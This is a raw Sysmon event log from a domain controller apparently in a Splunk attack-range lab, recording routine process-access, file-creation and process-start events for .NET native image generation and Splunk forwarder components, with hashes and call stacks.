21:00:52.966{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A104-60D3-5002-00000000CF01}3140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018614Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:52.966{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A104-60D3-5002-00000000CF01}3140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018613Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:52.900{4DB9351A-A103-60D3-4F02-00000000CF01}5828NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2XX8TX0L53\System.Data.Services.Client.ni.dll.auxMD5=80C12FF623F435CCE201475529881E66,SHA256=4AE338683CED4CA6481991CB55B56BB8474103956E0363D22D9B8194F0E07859,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018612Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:52.899{4DB9351A-A103-60D3-4F02-00000000CF01}5828NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2XX8TX0L53\System.Data.Services.Client.ni.dllMD5=090BD3E6F0B259F7B8F40DDE8E399EC4,SHA256=BDC81D5D3794EBAE332F10E7F900D52F34700853CB583AC31A66DFA58D893347,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018611Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:00:52.850{4DB9351A-A103-60D3-4F02-00000000CF01}5828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\16c4-0\System.Data.Services.Client.dll2021-06-23 21:00:52.850 23542300x800000000000000018610Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:52.782{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4727AF1CE8735CBE554ACFC1CCAF232,SHA256=31A4029E13D74206A7A05C309FF4A28E8202A277CD6A8BB251624039B7A0E566,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018609Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:52.275{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F919D971E9800840397957901801919,SHA256=22FAD660063B10354D2C0B653EEDB426EB87FFE19FC302CBEB5E1342AD473948,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018637Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.942{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBF0BA121FD5E6B8B9C1D6C2145AA5DE,SHA256=EB3FD89E7C480391C5B9D99225C93EB4154A3157C687987D972EDDC3658C2B5E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018636Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.755{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A105-60D3-5302-00000000CF01}3936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018635Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.755{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018634Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.755{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018633Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.755{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018632Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.755{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018631Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.755{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A105-60D3-5302-00000000CF01}3936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018630Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.755{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A105-60D3-5302-00000000CF01}3936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000018629Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.756{4DB9351A-A105-60D3-5302-00000000CF01}3936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018628Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.512{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A105-60D3-5202-00000000CF01}2680C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018627Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.497{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=824E816D346F3775C86749BF8AB3D05D,SHA256=15F002204801D7A1BFB023CE1E6665CF102242A4CF5828A3643D0981FBCC288D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018626Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.497{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A105-60D3-5202-00000000CF01}2680C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018625Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.497{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A105-60D3-5202-00000000CF01}2680C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018624Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.075{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A105-60D3-5102-00000000CF01}5332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018623Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.075{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018622Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.075{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018621Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.075{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018620Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.075{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018619Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.075{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A105-60D3-5102-00000000CF01}5332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018618Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.075{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A105-60D3-5102-00000000CF01}5332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000018617Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.076{4DB9351A-A105-60D3-5102-00000000CF01}5332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018659Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:54.942{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02E306665E7A78252212AF3211137CFE,SHA256=505BF1A1CE41A0C13AE17EE79E003C09358BE6EEAB1B06FA81BDEF49B858BD86,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018658Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:54.739{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A106-60D3-5602-00000000CF01}6804C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018657Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:54.739{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018656Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 